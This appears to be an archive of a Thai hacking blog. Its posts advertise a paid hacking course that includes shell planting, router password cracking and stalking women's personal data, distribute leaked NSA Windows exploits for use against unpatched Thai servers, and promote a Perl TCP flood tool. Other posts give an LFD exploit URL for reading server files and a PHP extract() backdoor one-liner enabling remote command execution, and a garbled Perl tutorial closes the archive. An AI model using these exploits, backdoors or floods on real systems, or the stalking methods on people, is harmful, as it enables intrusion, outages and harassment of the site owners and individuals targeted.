Kiss-Hack

คอร์ดรวมพื้นฐานการแฮค และ เทคนิคที่ใช้แฮค

2018-12-13T15:31:00.000+07:00

เปิดคอร์ดสอนแฮคเว็บอีกครั้ง

คอร์ดนี้จะสอนสำหรับ คนที่แทบไม่รู้อะไรเลย แต่ อยาก แฮคเป็น
Skill สำหรับผู้เรียน
- อ่าน เขียน ได้ก็เป็นพอ
- PHP พอได้ หรือ ไม่รู้อะไรเลย
- มีใจที่จะเรียน และ ต่อยอดกับสิ่งที่เรียน

คอร์ดเราสอนอะไรมั่ง

- การปลอมตัวใน Internet และการปลอม IP
- สอนเกี่ยวกับ พื้นฐานคอม Internet network
- PHP นิดหน่อยพอเข้าใจ
- ช่องโหว่ที่ใช้ Hack เว็บต่างๆ LFI , RFI , SQL Injection , LFD ฯลฯ
- การแฮคผ่าน Error message ฟังชั่น PHP
- พื้นฐาน SQL พอเข้าใจ
- เทคนิค Bypass และ การฝัง Shell และการประยุค จากช่องโหว่
- ทำความรู้จักกับ Drok เพื่อหา ช่องโหว่ ในการแฮค
- การสโตกเกอร์ข้อมูลสาว
- การทำ Shock จากเซิฟเวอร์ชาวบ้าน
- การแฮครหัสผ่านเราเตอร์

ราคาคอร์ด 4000 บาท สำหรับผู้ไม่รู้อะไรเลย

เรียนทางใหน? เรียนเท่าไร

สอนสดผ่าน Facebook , Steam , Teamviwe 10
มีเอกสาร PDF และ VDO ให้ดูบางส่วน
เวลาเรียนค่อยมาตกลงกันทีหลัง

ข้อตกลงก่อนเรียน

ผู้เรียนจะต้องเอาความรู้ไปใช้ ในทางที่ไม่ทำให้ตนเอง และ ผู้อื่นเดือดร้อน หากมีการ เกิดคดี ขึ้น ผู้สอนจะไม่รับผิดชอบใดๆต่อการกระทำของผู้เรียน ไม่ว่าจะกรณีใดๆก็ตาม (พ่อจะดีดใข่ให้)
เนื้อหาการสอนจะราวๆ VDO นี้

สนใจติดต่อที่ Inbox Facebook Fanpage : https://www.facebook.com/KissshotStudio/

เครื่องมือแฮค NSA สำหรับ Hack Windows

2017-07-28T11:48:00.000+07:00

ปล่อยเครื่องมือแฮค ของ NSA ฟรี ครับ อาจจะเก่า และ ช้าไปหน่อย แต่ เซิฟในไทยที่ใช้ Windows Server ที่ไม่ update ค่อนข้างเยอะ (ส่วนมากจะเป็น เซิฟเกมส์เถื่อน ต่างๆ)เครื่องมือที่จำเป็น

1. Windows 7 32bit

2. Python 2.6 - 2.7

3. PyWin32  http://clkmein.com/qBC7Br

สำหรับเครื่องมือแฮคนี้ ถูกออกแบบมาให้ใช้ได้บน Windows 7 32bit เท่านั้น จะใช้ VmWare หรือ VmBox จำลองขึ้นมา run หรือ จะเช่า VPS ก็เลือกใช้ตามใจ (สำหรับ VPS จะไม่ต้อง ยุ่งยากเรื่อง set forward port) 

VDO วิธีใช้นั้น ต้องขอบคุณทาง MaYaseven ที่ทำ VDO ออกมาแบบระเอียด

VDO : http://clkmein.com/qBC6iH

Docs : http://clkmein.com/qBC58u

Exploit : http://clkmein.com/qBC5GF

กฏระเบียบในเว็บและเพจ (วงการด้วย)

2016-09-11T10:38:00.000+07:00

ที่จริงก็ไม่อยากจะพูดอะไรมากมายให้รำคาญใจกันเปล่าๆ แต่ว่ายังไงผมก็ยอมรับว่า หากสังคมไม่มีกฏระเบียบคงวุ่นวายกันยกใหญ่ ไม่ว่าที่ใดย่อมมีกฏเป็นของตัวเอง ที่นี่ก็เหมือนกัน ทำไมผมต้องออกกฏ ทำไม ผมต้องทำอะไรให้ วุ่นวาย เพราะหากผมไม่ออก กฏ ละก็มีหวังเละแน่ เด็กเยอะ พวกดี ก็ดีไป พวกเกรียนก็เยอะ (พวกติดหนี้ก็มีมา) ที่นี้ยอมรับหมดครับไม่ว่าคุณจะสูงแค่ใหน ไม่ว่าคุณจะต่ำเพียงใด ขอให้รู้ไว้ครับว่า Kiss-Hack กับ KissShot - Studio ก็เหมือนกับ บ้าน โรงเรียน สถานที่พักผ่อน ของคุณ...

กฏเหล็กที่ต้องทำตาม

1.ห้ามใช้ความรู้ที่ได้ไป เกรียนชาวบ้านเพื่อความสนุก ส่วนตัว
2.ห้ามใช้คำหยาบ ในเพจ เว็บ บล๊อก ผมไม่ชอบเด็กที่ไม่รู้จักผู้หลัก ผู้ใหญ่
3.ก่อนที่จะถามผม คุณลองหา จาก Google มารึยัง ลองค้นดูก่อน
4.ไม่รับทำโปร ไม่รับ Hack เป็นการส่วนตัว ไม่รับยิง IP หรือ อะไรทั้งสิ้น โปรแกรมมีไว้ให้แล้ว เอาไปใช้เองครับ
5.ถ้าอยากเป็น Hacker , Cracker , Programmin ศึกษาครับ ลงเรียนคอร์ดสอน หรือ ศึกษา Google การเรียนนั้นเราต้องค้นหามัน ไม่ใช่รอให้มันมาหา
6.อยากให้รู้ไว้เสมอว่า การ Hack นั้นมันไม่เท่ หรือ ง่าย แบบในหนัง ไม่ใช่ว่าเรียนปุ๊บเจาะระบบ ธนาคาร ได้ปั๊บ มันต้องรู้จักคิดครับ เหมือนนโยบายของเว็บ "คิดจะแฮค ต้องคิดให้เป็น" มันต้องรู้จัก การทำงานของระบบก่อน ต้องรู้ว่า เว็บนั้นมีช่องโหว่อะไร พาธ อะไร มันต้องรู้จักต่อยอดไปเรื่อยๆ การเรียนรู้ไม่มีจบหรอกครับ

คิดกฏอื่นออก ตอนใหนจะมาเพิ่มครับ
-ขอบคุณครับ-

PHP เบื้องต้น (คุยกันก่อน)

2016-08-21T10:28:00.000+07:00

Kiss-Hack : PHP เบื้องต้น

ในบทความนี้ จะเป็นการเปิด หมวดหมู่ใหม่นั้นก็คือ PHP เบื้องต้น เนื่องจากการ Hack นั้นส่วนมากจะมี ภาษา PHP ปนมาด้วย (หลักๆ คือสอนแนวๆทำเว็บ นั้นละ) ภาษา PHP นั้นสามารถเขียนรวมกับ HTML เพื่อแสดงผล ถ้ารู้ภาษา PHP แล้วก็สามารถรู้ได้ว่า ช่องโหว่ตรงนั้นตรงนี้ จะเจาะตรงใหนแบบนี้

ในการเตรียมตัวสำหรับการเขียน ที่คุณ้องเตรียมคือ

1.AppServ โหลดได้ที่ : http://sourceforge.net/
2.Xampp    โหลดได้ที่ : http://www.apachefriends.org/en/xampp-windows.html
3.Notped++ โหลดได้ที่ : Google (หาเอาครับ ^^)

ติดตั้งเสร็จแล้ว ส่วนการปรับแต่งนั้นหาได้ที่ Google

   ในการเขียนภาษา PHP นั้นก็ไม่ได้ ซับซ้อนอะไร ผมก็ไม่อยากจะพูดอะไรมาก (ขี้เกียจ) มาเข้าเรื่องกันดีกว่า

   ในการสอนทั่วไปก็คงจะ สอนใช้คำสั่ง Print สวัสชาวโลก หรือ Hello Word อะไรแบบนี้ สินะครับ

คำสั่ง Print คืออะไร??

Print เป็นคำสั่งที่ใช้แสดงค่าของตัวแปร หรือ แสดงค่าของ PHP สำหรับข้อแตกต่างระหว่างคำสั่ง print กับ echo ก็คือ echo สามารถแยกแทรกนิพจน์ หรือค่าตัวแปรลงไปได้ โดยใช้เครื่องหมาย , คั่น
โครงสร้างของ PHP คือ <? คำสั่ง ?> หรือ <?php คำสั่ง ?> และทุกครั้งที่จบคำสั่ง หรือ ประพจต่างๆให้ จบด้วย ; ทุกครั้ง

ตัวอย่าง

เมื่อแสดงบน เบราวเซอร์

ส่วนการใช้ตัวแปรนั้น สามารถใช้แบบเดียวกันได้ แต่ครั้งนี้ในการประกาศตัวแปร จะใช้ echo

ตัวแปร (PHP Variables) คือ??

ตัวแปรชื่อที่ใช้สำหรับเก็บข้อมูล

กฏการตั้งชื่อตัวแปรในภาษา PHP

- ตัวแปรทั้งหมดในภาษา PHP จะขึ้นต้นด้วยเครื่องหมาย $ แล้วตามด้วยชื่อตัวแปร
- ชื่อของตัวแปรต้องขึ้นต้นด้วยตัวอักษรหรือเครื่องหมาย _ เท่านั้น
- ชื่อของตัวแปรสามารถมีตัวอักษร ตัวเลข หรือขีดกลางเท่านั้น
- ชื่อของตัวแปรต้องไม่มีช่องว่าง
- ตัวใหญ่ตัวเล็กถือว่าต่างกัน

สิ่งที่ต้องรู้เกี่ยวกับตัวแปรใน PHP

- ค่าของตัวแปรคือค่าที่ได้ จากการประกาศล่าสุด
- ค่าของตัวแปรจะถูกกำหนดด้วยเครื่องหมาย = ซึ่งต้องอยู่ทางซ้าย และค่าที่ได้คือค่าที่ได้จากทางขวา
- ตัวแปรสามารถประกาศก่อนใช้งานได้ แต่ไม่จำเป็น
- ตัวแปรในภาษา PHP ไม่ต้องบอกชนิดของตัวแปร

การใช้ตัวแปรนั้นจะใช้ ในรูปข้างล่าง

การประกาสตัวแปรนั้นจะใช้ echo

เมื่อเปิดเบราเซอร์เรียกใช้แล้ว ก็จะได้

ไม่ว่าคุณจะตั้งชื่อตัวแปรเป็นภาษาใดก็ตาม ถ้าคุรทำตามกฏของมันก็สามารถทำงานได้ปกติ

อยากเป็น Hacker

2016-08-16T10:00:00.000+07:00

อยากเป็น Hacker : Hack | สอนHack | Hacker

คำถาม : พี่ครับผมอยากเป็น Hacker ต้องทำยังไง
ตอบ : พยายามครับ
คำถาม : แล้วต้องพยายามยังไง
ตอบ : พยายามอ่านบทความเกี่ยวกับ Security ทำความเข้าใจกับมัน

##################################################

มีเยอะเลยเดียวนี้ ที่ชอบถามว่า Hack ยังไง อยากเป็น Hacker ต้องทำยังไง อะไรแบบนี้ อันดับแรกเลยคือ เราต้องทำความเข้าใจกับสิ่งที่เรากำลังจะทำก่อน อย่างเช่น Hack Facebook ทำยังไง อย่างแรกเลยคือ คุณต้องเข้าใจหลักการทำงานของ Facebook ก่อนว่ามันทำงานยังไง ส่งค่าไปใหน

สมัยนี้มี Tool สำเร็จรูปแจกเกลื่อน ยิ่งกว่าตลาด จนพวกใข่ของ Hacker มีเต็มบ้านเต็มเมือง แล้วก็ยังมีพวกที่ใช้ Hack Tool แล้วสถาปันณา ตนเองเป็น Hacker ก็มี

ถามว่าใช้ Hack Tool ผิดหรอ? ก็ไม่ผิดหรอก แต่ว่าก่อนจะใช้ เราควรทำความเข้าใจกับระบบมันก่อน ว่ามันทำงานยังไงใช้ยังไง

แล้วก็คำถามที่สุดเบื่อคือคำถามที่สามารถหาเองได้โดยใช้ Google แต่ไม่คิดจะใช้ เอาแต่คอยพึ่งคนอื่นอยู่ตลอดเวลา ถามว่าผิดหรอ? ก็ไม่ผิดอีกนั้นละ แต่มันน่ารำคาญ เพราะอะไร? เพราะผมก็ใช่ว่าจะเก่งทุกอย่าง มีหลายอย่างที่ผมไม่รู้ เวลาคนเรามี 24 ซ.ม. เหมือนกัน ผมใช้เวลา 8 - 10 ซ.ม. หมดไปกับการศึกษา บทความชาวบ้านเขา

ก็ไม่อยากจะพูดอะไรมากเพราะ ผมเองก็ใช่ว่าจะรู้ทุกอย่าง สิ่งที่สำคัญสำหรับ Hacker คือ ความอดทน ความพยายาม การเดาอย่างมีหลักการ ความเข้าใจในระบบ

ส่วนเรื่องการยิง IP นั้นผมตั้ง Keyword ไว้เพื่อน้องๆ ที่ใช้ Google สแกนหาคำว่า ยิง IP แล้วมาเจอ เว็บผม จุดประสงค์ก็เพื่อ ต้องการให้น้องๆพี่ๆ ทำความรู้กับ คำว่า " Hacker " จริงๆ และการยิง IP มันทำงานยังไง แต่ผมไม่สนับสนุนเพราะ ถ้าคุณไปยิงเขา คุณก็ "เกรียน"ดีๆนี่ละ

-END-

มาพูดถึงเรื่องการ ยิงIP ด้วย Flood ต่างๆกัน

2015-08-23T12:03:00.000+07:00

มาทำความเข้าใจกันก่อนเลยว่าการยิง IP การ Flood นั้นคืออะไร เด็กหรือผู้ใหญ่บางท่านไม่เข้าใจ การ Flood IP นั้น ไม่ใช่ว่า เฮ้ยกูมีโปรแกรมยิง IP วะ กูจะยิง IP ไอ้นี่ พอยิงปุ๊บแล้วดับเลย

มันไม่ได้ง่ายแบบนั้นนะ หนู ถ้าเป็นแบบนั้น ป่านนี้คงไม่ต้องมาเช่าเซิฟ Hack เซิฟ ทำ DDos Zombie ให้วุ่นวายหรอก นอกจากว่า คอมคุณเป็นเซิฟขนาดใหญ่แล้ว ทำ DDos สัก 10000 ตัวยิงไปที่เว็บ www.kiss-hack.blogspot.com จากนั้นเว็บผมก็ร่วงตามระเบียบ

มันไม่ใช่ว่าโหลด โปรแกรมยิง IP มาใส่ไว้ในคอม กากๆ 1 เครื่องแล้วยิงชาวบ้าน (ถ้าทำแบบนั้นคอมคุณนั้นละที่จะซวย)
ซึ่งเมื่อก่อนเว็บหลักผม โดน DDos Zombie เดี้ยงไปแล้ว (พวกในวงการเดียวกันนั้นละ)

อธิบาย ยิงIP แบบจริงจัง

การยิงIP นั้นมันมีอยู่หลายวิธีทั้ง การ Flood Ping ส่งข้อมูล Packet ขนาดต่างๆ เข้าไปในคอมผ่าน พอต์ไอพีเหยื่อ จนไม่สามารถประมวณผลได้ทัน จนเกิดการล่ม

โปรแกรมยิง TCP Flood ของ Kiss-Hack ใช้ได้จริงใหม?

มันก็ใช้ได้สิ ก็ Test ให้ดูแล้ว โดยการจำลองเซิฟเวอร์ แล้วยิงให้ดู หาดูได้ในหมวด Youtube แต่การยิงเซิฟใหญ่ๆ ต้องอาศัยการ ประชาทัณ หรือ รุม นั้นเอง เซิฟเวอร์ 1 เครื่อง โดน เซิฟเวอร์ 10 กว่าเครื่องรุมยิง ไม่ต้องเดาก็รู้แล้วว่า เดี้ยงแน่

โปรแกรมนี้เขียนขึ้นจากภาษา Perl

กดเข้าไปอ่าน และ โหลด

วิธีใช้ Google เพื่อหา สิ่งที่ต้องการ

2015-04-06T18:11:00.001+07:00

ช่องโหว่ LFD PHP Function readfile();

2014-11-10T14:53:00.000+07:00

ช่องโหว่ PHP Function readfile();

ในบทความนี้เกริ่นก่อนเลยว่าตู มั่วนิ่มในการอธิบาย 40% ตรงใหนอธิบายผิดหรือข้ามกรุณาช่วยกระซิบเบาๆที่ข้างหูผมด้วยนะ

     ไอ้ช่องโหว่นี้ เมื่อก่อนจะเห็นอยู่บ่อยๆ ในเว็บ Download ต่างๆ หรือ เว็บเอกสาร ซึ่งชื่อเทคนิคการแหกนี้ คือหนึ่งในเทคนิคของ LFI ( Local File Inclusion ) นอกจากนี้ยังมีฟังชั่น showssource() , highlight_file() ก็ใช้เปิดไฟล์ได้ ถ้ารับ user input ที่ไม่ได้ sanitize เข้าไปก็มีความเสี่ยงเกิด LFI ได้เหมือนกัน

     เมื่อก่อน (นานมาก) เคยคุยเรื่องนี้กับ AK-1 อยู่เนื่องๆ เพราะ ผมดูแล้วมันเป็นช่องโหว่ที่อันตรายมาก และ มักจะเกิดกับ เว็บที่เปิดให้ Download ไฟล์ต่างๆในเว็บ โดยที่ไม่ได้เขียน Code ให้รัดกุม จนทำให้สามารถ Download ไฟล์อื่น ที่อยู่ในเซิฟเวอร์ออกมาอ่านได้

    ไอ้ช่องโหว่นี้เกิดจากการใช้ ฟังชั่น readfile() ของ PHP ในการเขียนไฟล์สำหรับ Download ของเว็บ (นอกจากฟังช้่น readfile() แล้วก็มี อันอื่นอีก) จาก Code ในภาพ จะเห็นว่า บรรทัดที่ 3 จะกำหนด ตัวแปรที่ชื่อว่า $filename กำหนด Method เป็น GET และ Parameter ที่ชื่อว่า path ซึ่งจะสามารถรับค่า ที่จะ Download ไฟล์ออกมา (สามารถกำหนด พาธ ไฟล์ที่จะโหลดได้อย่าง ( /etc/passwd )

    ในส่วนต่างๆของโค้ดจะเป็นการกำหนด Header ให้เบราเซอร์รู้ว่าเป็นการ Downlaod อันนี้เอาไปศึกษาเองนะ (ง่วงแล้ว) เรามาดูในส่วนสำคัญกันดีกว่า ในบรรทัดที่ 30 จะเห็นว่ามีการเรียกใช้ ฟังชั่น readfile(); ซึ่ง ฟังชั่น readfile() นี้ คล้ายๆ ฟังชั่น fopen() คือการเอาไฟล์ที่ถูกกำหนดจาก Parameter มาอ่าน หากดูใน Code ดังภาพแล้ว จะเห็นว่าฟังชั่น readfile($filename); กำหนดให้ ดึงค่าจากตัวแปร $filename ออกมาใช้ จะสามารถใช้งานเพื่อ Downlaod เอกสาร หรือ ไฟล์ต่างๆในเซิฟเวอร์ออกมาได้

การใช้งานจากช่องโหว่ Code ข้างต้น

Exploit : 127.0.0.1/load.php?path=/var/www/access.log

#จะก๊อปก็เอาเครดิตไปด้วยนะสลัด ด้วยรัก และ ฟัคยู

ที่มา : https://www.facebook.com/notes/tawan-naultang/%E0%B8%8A%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B9%82%E0%B8%AB%E0%B8%A7%E0%B9%88-php-function-readfile/734494709958006

ช่องโหว่ RCE ในฟังชั่น Extract PHP

2014-02-27T22:35:00.000+07:00

จากบทความ ช่องโหว่ extract function ที่เรียกใช้ Commend ใน Function PHP จะเห็นบ่อยๆใน code ของ developer ในสมัย PHP 4.x

จากโค้ด

<?php @extract ($_REQUEST); @die ($ctime($atime)); ?>

extract จะเหมือนกับว่า ไปดึง $_REQUEST มาใช้ ซึ่ง $_REQUEST นี่ เป็นตัวแปรที่สร้างขึ้นไว้ในไฟล์ PHP หรือภาษา Script อื่นๆ ที่มีการสร้างขึ้นมาเพื่อใช้ ในการรับค่าของตัวแปร method หรือวิธีการที่ใช้ส่งข้อมูลทั้งสองแบบ คือ GET และ POST โดย $_REQUEST จะสามารถเข้าถึงค่าข้อมูลได้โดยไม่จำเป็นต้องระบุว่าเป็น method เท่านั้น

และ die เป็นฟังชั่นใน PHP ที่สามารถเขียนอะไรลงไปก็ได้

ดูจากภาพด้านล่าง

ตัวแปร $ctime และ $atime หาก ctime เป็น system แล้ว atime เป็น คำสั่ง Command ก็จะสามารถเรียกใช้ Command line หรือ CMD ได้

สรุป Hacker จะสามารถทำ remote command execution ได้ ตุบตั๊บ เซิฟเวอร์โดน แฮค

บทความ extract function PHP : http://blog.sucuri.net/2014/02/php-backdoors-hidden-with-clever-use-of-extract-function.html

เครดิต : https://www.facebook.com/notes/tawan-naultang/php-backdoors-extract-function/512875195453293

การเขียนภาษา Perl เบื้องต้น

2014-02-07T10:20:00.000+07:00

ภาษา Perl คือ

ภาษา Perl เป็็นภาษาทีี่ใช้้ตัวแปรภาษาแบบ Interpreter ซึ่งก็คือจะทำการรัน
คำสั่งและแปลความหมายทีละบรรทัด ซึ่งแตกต่างจากตัวแปลภาษาแบบ
Complier เช่่น ภาษาซี เป็น็ ต้้น โดยในการรันภาษา Perl ทำได้  2 วิธี คือ

วิธีที่ 1 : รันจากจาก Interpreter โดยตรง เช่น

#perl myfile.pl

วิธีที่ 2 : รันผ่านโปรแกรม ShellRun ซึ่งในการรันแบบนี้ ในบรรทัด

อย่างแรกจะต้องบอกที่อยู่ของ Perl Interpreter ก่อน ซึ่งการใส่บรรทัดแรกนี้
มีชื่อเรียกว่า “Shebang” ซึ่ง Shebang จะต้องประกาศในบรรทัดแรก
ของ SourceCode
ก่อน ซึ่งการใส่บรรทัดแรกนี้
มีชื่อเรียกว่า “Shebang” ซึ่ง Shebang จะต้องประกาศในบรรทัดแรก
ของ SourceCode
THE SHEBANG
ส่่วนหัวของไฟล์ใ์ในกรณีเขียนแบบ Shebang จะต้้องเพิิ่มดังนีี้

#!/usr/bin/perl หรือ #!/usr/bin/env perl

ในการตรวจสอบเวอร์ชั่นของ Perl สามารถใชค้คำาสั่ง

#perl –v

นอกจากนี้ ในกรณีที่รัน Perl แบบ Shebang จำเป็นที่จะต้องแจ้ง
ให้ระบบปฏิบัติการสามารถ Execute File ได้ โดยใช้คำสั่ง chmod
โดยที่เปลี่ยนสิทธิ เฉพาะ Owner ให้สามารถ Execute File ได้ก็
เพียงพอ
โครงสร้า้งการเขียน PERL SCRIPT

ทุกประโยค (Statement) ต้้องปิดท้้ายด้้วยเครืื่องหมาย ; (semicolon)
ฟังก์ชั่นและตัวแปร เป็นแบบ Case Sensitive
การเขียนหมายเหตุ (Comments) สามารถใช้เครื่องหมาย “ # ” ที่ต้น

ข้อความ และจะมีผลไปถึงจนจบบรรทัด
ห้ามใช้เครื่องหมาย // หรือ /* … */

   Perl จะไม่แสดงข้อผิดพลาด หรือคำเตือนใดๆ (Warning) จนกว่า
ผู้้ใช้จ้ ะเพิิ่มคำสั่ง use warnings; หรือ –w ที่ออบชั่นของ Shebang

#!/usr/bin/perl -w

การประกาศตัวแปร (VARIABLE DECLARATIONS)

ภาษา Perl ไม่จำเป็็นต้้องประกาศตัวแปร แต่ถ้้าต้้องการให้้ Perl มี
การบังคับให้ต้องมีการประกาศตัวแปรก็สามารถทำได้ โดยใช้
คำสั่ง

   use strict; #ประกาศครั้งเดียว
   my <ชื่อตัวแปร>;

ชนิดของตัวแปร (VARIABLES TYPE)
ตัวแปรพื้นฐานแบ่งออกเปน็็ 3 ชนิด หลักๆ ไดแ้้ก่

Scalar
Array
Hash

ตัวแปรชนิด SCALARS

ตัวแปรชนิด Scalars คือ ตัวแปรที่สามารถเก็บค่าได้้เพียงค่าเดียว
เท่านั้นในหนึ่งตัวแปรในภาษา C/C++ มีตัวแปรชนิด Scalars อยู่หลายชนิดได้แก่
int, float, double, char, bool
ซึ่งตัวแปร Scalars ในภาษา Perl สามารถที่เก็บข้อมูลได้หลายชนิด
เช่น จำนวนเต็ม (Integer), ทศนิยม (Floating-Point) และอื่นๆ เป็น
ต้น

ตัวแปรชนิด SCALARS

ตัวแปรชนิด Scalar จะขึ้นต้้นด้้วยเครื่องหมาย “ $ ” ตัวอักขระถัด
จากเครื่องหมาย $ สามารถเป็นได้ทั้งตัวอักษร a-z, A-Z และ “ _ ”
(UnderScore) ต่อจากตั้นสามารถเป็นได้ทั้งตัวอักษร a-z, A-Z และ
“ _ ” (UnderScore) และตัวเลขซึ่งจะเหมือนกับการประกาศตัว
แปรในภาษาซีเว้นแต่จะมีเครื่องหมาย $ ขึ้นต้น
ชื่อตัวแปรมีความยาวได้ตัั้งแต่่ 1 ถึง 251 ตัวอักษร
เช่น $foo, $a, $zebra1, $F87dr_df3
ตัวอย่างการประกาศตัวแปรที่ผิด

$24da, $hi&bye, $bar$foo

การกำหนด่า่ ตัวแปร

$foo = 3;
$d = 4.43;
$temp = ‘Z’;
$My_String = “Hello, I’m Paul.”

ตัวแปร LISTS

ตัวแปร List มาจากตัวเต็มว่า่ “list literal” ซึ่งเป็็นตัวแปรทีี่มีการจัดเก็บค่า่
แบบเรียงลำดับไว้ ซึ่งถูกคั่นด้วยเครื่องหมาย “ , ”
ตัวแปร List สามารถเก็บตัวเลขหรือข้อ้ มูลอืื่นๆ เช่่น

(43, “Hello World”, 3.1415)

การกำหนดค่าให้กับตัวแปร Lists สามารถกำหนดค่าได้หลายๆ ค่า พร้อม
กันเช่น

($a, $b, $c) = (42, “Foo bar”, $size);
โดยที่ $a 42, $b “Foo bar”, $c $size

ตัวแปร List สามารถกำหนดได้โดยใช้ช่วงข้อมูล (Range)

($a, $b, $c, $d, $e) = (1..4, 10);
($x, $y, $z) = (“a” .. “c”);

การกำหนดค่า่ ให้กัั้บตัวแปร LIST
ทั้งสองด้้านของเครืื่องหมาย “ = ” ไม่จำเป็นตอ้งมีจำนวนขอ้้มูลทั้งด้้านซ้้าย และขวาที่เท่ากัน เช่น

($a, $b, $c) = (5, 10, 15, 20);
โดยที่ $a 5, $b 10, $c 15. (20 ไม่ถูู่กกำหนด)

($a, $b, $c) = (5, 10);
โดยที่ $a 5, $b 10, $c ไม่กำหนดค่า

($t1, $t2) = ($t2, $t1);
โดยที่ $temp = $t1; $t1 = $t2; $t2 = $temp;

ตัวแปร ARRAYS

ตัวแปร Arrays ในภาษา Perl จะมีความยืดหยุ่นกว่าในภาษา
C/C++ คือ ไม่ต้องกำหนดขนาด Array หรือชนิดของตัวแปร ภายในตัวแปร Array สามารถ จัดเก็บข้อ มูลได้้หลายชนิด เช่่น

เก็บค่าตัวเลข และตัวอักษร ในตัวแปร Array เดียวกันได้
ตัวแปร Array จะขึ้นต้นด้วยเครื่องหมาย “@” เช่น
@array, @foo, @My_Array, @temp34
การกำหนดค่า่ ให้กัั้บตัวแปร ARRAY
@foo = (1, 2, 3, 4);
@bar=(“my”,“name”,“is”,“Paul”);
@temp = (34, ‘z’, “Hi!”, 43.12);
$let = $temp[1]; # $let is now ‘z’

ถ้าต้องการนำค่าเข้าและออกค่าเดียวออกจาก ตัวแปร Array ให้
ใช้เครื่องหมาย $ แทน @
$bar[2] = “was”;
@bar now (“my”, “name”, “was”, “Paul”);

LISTS ของตัวแปร ARRAYS
ตัวแปร Arrays ที่อยู่ด้้านซ้้ายของเครื่องหมายเท่ากับ จะเก็บค่าที่อยู่
ด้านขวาของเครื่องหมายเท่ากับ

($foo, @bar, $baz)=(1, 2, 3, 4, 5, 6);
โดยที่ $foo=1; @bar=(2, 3, 4, 5, 6); $baz=undef;

การเชื่อมต่อตัวแปร Array ด้วยตัวแปร Arrays
@a1 = (1, 2, 3); @a2 = (4, 5, 6);
@a3 = (@a1, @a2);
@a3 (1, 2, 3, 4, 5, 6)

เพิ่มเติมเกี่ยวกับตัวแปร ARRAYS
การหา Indexing ตัวสุดท้้ายของ Array
@foo = (6, 25, 43, 31);
$#foo 3. Last index of @foo.

โดยที่ $foo[$#foo]   31;
การกำหนดปรับขนาดของตัวแปร Array
$#foo = 5;
เป็นการสร้าง Undefined values ที่ค่าต่อท้ายตัวแปร @foo
$#foo = 2;
เป็นการตัดค่าของตัวแปร @foo ให้เหลือเพียง 3 ค่า คือ 0-2
เพิ่มเติมเกี่ยวกับตัวแปร ARRAYS

ตัวแปร Array สามารถกำหนด Index เป็็นค่าลบได ้ คือ ถ้า้ index 0
คือค่าแรก index -1 คือค่าสุดท้าย และ index -2 คือค่ารองสุดท้าย
เช่น $foo[$#foo] และ $foo[-1] มีความหมายเดียวกัน คือ
Index สุดท้าย

สามารถดึงข้อมูลบางส่วนของ Array ได้ดังนี้
@bar = @foo[1..3]; @bar (25, 43, 31)
@bar = @foo[0,2]; @bar   (3, 43)
@bar = @foo[1]; @bar (25);

การเชื่อมต่่อและแยกข้้อความ JOIN/SPLIT
การเชื่อมต่่อและแยกขอ้้ ความ เปน็็ คำสัั่งที่มีอยู่่ในภาษา Perl อันได้แ้ ก่่
คำสั่ง split ใช้แยกข้อความออกเป็นหลายๆ ค่าด้วยเครื่องหมายที่กำหนด

$BigString = “Hello,_I_am_Paul”;
@strings = split ‘_’, $BigString;
โดยที่ @strings (“Hello,”, “I”, “am”, “Paul”);
คำสั่ง join เป็นคำสั่งที่ใช้เชื่อมข้อความเข้าด้วยกัน
$BigString = join ‘ ’, @strings;
โดยที่ $BigString “Hello, I am Paul”;

HASH
(somewhat) Analogous to datatype hashtable.
More closely resembles STL map
aka “Associative Array” – ie, array not indexed by
numerical sequence.
list of keys and values.
All hash variables start with %
Use to keep list of corresponding values
TIP: Any time you feel the need to have two separate
arrays, and do something with elements at
corresponding positions in the arrays (but don’t care
where in array elements actually are), USE A HASH
HASH EXAMPLE
Want a list of short names for months:
%months = (
“Jan” => “January”,
“Feb” => “February”,
“Mar” => “March”,
…
);
reference by *curly* brackets…
Avoid confusion with array notation
$month{“Jan”} “January”;
MORE HASH EXAMPLES
Hash elements can be dynamically created (in fact,
so can entire hashes)
$profs{“Perl”} = “Paul Lalli”;
$profs{“Op Sys”} = “Robert Ingalls”;
$profs{“CS1”} = “David Spooner”;
%profs (“Perl” => “Paul Lalli”,
“Op Sys” => “Robert Ingalls”,
“CS1” => “David Spooner”);
Hashes will “flatten” into normal lists:
@p_arr = %profs;
@p_arr 􀃆(“Perl”, “Paul Lalli”, “Op Sys”, “Robert
Ingalls”, “CS1”, “David Spooner”);

ตัวแปรพิเศษทีี่อยูใ่่ นภาษา PERL

$! – last error received by operating system
$, – string used to separate items in a printed list
$” – string to use to separate items in an
interpolated array (this makes sense next week)
$_ - “default” variable, used by several functions
%ENV – Environment variables
@INC – directories Perl looks for include files
$0 – name of currently running script
@ARGV – command line arguments

คำสัั่งแสดงผลลัพธ์อ์ อกทางจอภาพ

the print statement.
Takes a list of arguments to print out
Before the list of arguments, optionally specify a
filehandle to which to print
If omitted, default to STDOUT
If the list of arguments is omitted, print whatever
value is currently in variable $_

ตัวอย่า่ งการแสดงผลด้้วยคำสัั่ง PRINT

Hello World program:

#!/usr/bin/env perl
print “Hello World\n”;

ตัวอย่่าง

print “My name is $name\n”;
print “Hi ”, “what’s ”, “yours?\n”;
print 5 + 3;
print ((4 * 4). “\n”);

การแสดงผลด้้วยคำสัั่ง PRINT ในรูปแบบอื่นๆ
สามารถใช้้คำสั่ง Print กับตัวแปร List ซึ่งโดยปกติแล้้ว คำสั่ง Print จะ
แสดงผลลัพธ์ของ Element ของ List เรียงต่อในบรรทัดเดียวกัน เช่น

@nums = (23, 42, 68);
print @nums, “\n”;

ผลลัพธ์ที่ได้ 234268
สามารถเปลี่ยนสัญลักษณ์ที่ใช้คั่นระหว่าง Element ของ List โดยใช้ตัวแปร

$,
$, = “, ”;
print @nums, “\n”;

ผลลัพธ์ที่ได้ 23, 42, 68
การรับค่่าจากคีย์บ์ อร์์ด
ตัวดำเนินการในการรับค่่า คือ “ <> ”
มีชื่อเรียกว่า “angle operator” หรือ “diamond operator” ใช้สำหรับอ่าน
ไฟล์หรือคีย์บอร์ด ซึ่งค่าปกติ คือ STDIN
ตัวอย่างเช่น

$input = <>;
อ่า่นค่าจาก STDIN และบันทึกไว้ที่ตัวแปร $input
@input = <>;
เป็นการอ่านค่าจาก STDIN และบันทึกไว้ที่ตัวแปร @input
คำสัั่ง CHOP และ CHOMP
เมื่อมีการอ่่านขอ้้ มูลแบบบรรทัด จะมี White Space ต่่อท้า้ยบรรทัดคือ “\n”
ซึ่งไม่ต้องการนำมาใช้ในการประมวลผล

